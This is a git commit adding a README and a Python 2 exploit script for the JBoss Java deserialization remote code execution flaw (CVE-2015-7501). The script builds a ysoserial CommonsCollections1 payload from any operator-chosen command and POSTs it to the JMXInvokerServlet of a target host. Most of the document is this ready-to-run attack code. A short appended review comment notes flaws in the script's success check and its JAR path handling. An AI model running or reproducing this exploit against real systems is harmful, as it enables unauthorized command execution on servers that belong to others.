Added JBoss RCE exploit (CVE-2015-7501)
1 parent
c574129
commit 3390f2f
Showing
5 changed files
with
69 additions
and
1 deletion.
File renamed without changes.
File renamed without changes.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
# JBoss Java Deserialization RCE (CVE-2015-7501) | ||
|
||
Exploit for the JBoss Java Deserialization RCE (CVE-2015-7501) | ||
|
||
The python script uses [ysoserial](https://github.com/frohoff/ysoserial) to dynamically generate the payload. Therefore java is required as well. | ||
|
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,61 @@ | ||
#! /usr/bin/env python2 | ||
|
||
# Jboss Java Deserialization RCE (CVE-2015-7501) | ||
# Made with <3 by @byt3bl33d3r | ||
|
||
import requests | ||
from requests.packages.urllib3.exceptions import InsecureRequestWarning | ||
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | ||
|
||
import argparse | ||
import sys, os | ||
#from binascii import hexlify, unhexlify | ||
from subprocess import check_output | ||
|
||
ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar'] | ||
ysoserial_path = None | ||
|
||
parser = argparse.ArgumentParser() | ||
parser.add_argument('target', type=str, help='Target IP') | ||
parser.add_argument('command', type=str, help='Command to run on target') | ||
parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)') | ||
parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)') | ||
|
||
if len(sys.argv) < 2: | ||
parser.print_help() | ||
sys.exit(1) | ||
|
||
args = parser.parse_args() | ||
|
||
if not args.ysoserial_path: | ||
for path in ysoserial_default_paths: | ||
if os.path.exists(path): | ||
ysoserial_path = path | ||
else: | ||
if os.path.exists(args.ysoserial_path): | ||
ysoserial_path = args.ysoserial_path | ||
|
||
if ysoserial_path is None: | ||
print '[-] Could not find ysoserial JAR file' | ||
sys.exit(1) | ||
|
||
if len(args.target.split(":")) != 2: | ||
print '[-] Target must be in format IP:PORT' | ||
sys.exit(1) | ||
|
||
if not args.command: | ||
print '[-] You must specify a command to run' | ||
sys.exit(1) | ||
|
||
ip, port = args.target.split(':') | ||
|
||
print '[*] Target IP: {}'.format(ip) | ||
print '[*] Target PORT: {}'.format(port) | ||
|
||
gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command]) | ||
|
||
r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget) | ||
|
||
if r.status_code == 200: | ||
print '[+] Command executed successfully' | ||
|
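Review bot: The final check prints `[+] Command executed successfully` whenever the POST returns HTTP 200, but a 200 only shows that the servlet answered, not that the serialized object was processed, so a patched or filtered host may be reported as vulnerable, and any other status prints nothing at all. I would report only what was observed, unconditionally, e.g. `print '[*] Server returned HTTP {}; execution not confirmed'.format(r.status_code)`. Separately, the default-path loop has no `break`, so `../ysoserial.jar` overrides `./ysoserial.jar` when both exist, and whichever JAR is found is passed to `java -jar` on the operator's machine with no integrity check; adding `break` after `ysoserial_path = path` makes the choice deterministic, and the README could state the expected JAR checksum. The `if not args.command` branch is unreachable because `command` is a required positional argument.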